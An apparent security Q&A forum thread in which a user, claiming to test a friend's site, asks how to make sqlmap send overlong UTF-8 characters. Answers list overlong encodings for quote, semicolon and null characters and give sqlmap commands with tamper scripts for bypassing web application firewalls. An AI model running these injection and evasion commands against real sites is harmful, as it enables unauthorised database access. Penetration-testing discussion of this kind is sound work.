
I'm currently pentesting my friends website. I found an SQL injection with acunetix' help:

- URL encoded GET input for was set to 1#####
Error message found: 
supplied argument is not a valid MySQL result

So I tried running a normal sqlmap:

./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25

Output:

[11:16:31] [WARNING] URI parameter '#1*' is not injectable
[11:16:31] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

So I need a way to include those #'s (for=1%00%c0%a7%c0%a2). I tried --string and --suffix, but they didn't do the job. Maybe there's a tamper for this?

h4ckNinja
nickvl

Comment: I don't understand how you know this is vulnerable to SQL injection; have you tested it manually? In my experience, it is better to do it manually than to rely on a tool completely. Could you give more information about the vulnerable parameter to determine what sqlmap options are appropriate for this? – hmrojas.p Sep 06 '16 at 01:57

2 Answers

These characters are overlong UTF-8:

' = %27 = %c0%a7 = %e0%80%a7 = %f0%80%80%a7
" = %22 = %c0%a2 = %e0%80%a2 = %f0%80%80%a2
< = %3c = %c0%bc = %e0%80%bc = %f0%80%80%bc
; = %3b = %c0%bb = %e0%80%bb = %f0%80%80%bb
& = %26 = %c0%a6 = %e0%80%a6 = %f0%80%80%a6
\0 = %00 = %c0%80 = %e0%80%80 = %f0%80%80%80

If you are using SQLMAP you can use --tamper=overlongutf8 to exploit the vulnerability.

lmiller

There is one more way: you can use all of the tampers in one line, like so:

./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

By using this, you can get past all of the WAFs.

Oya Ü.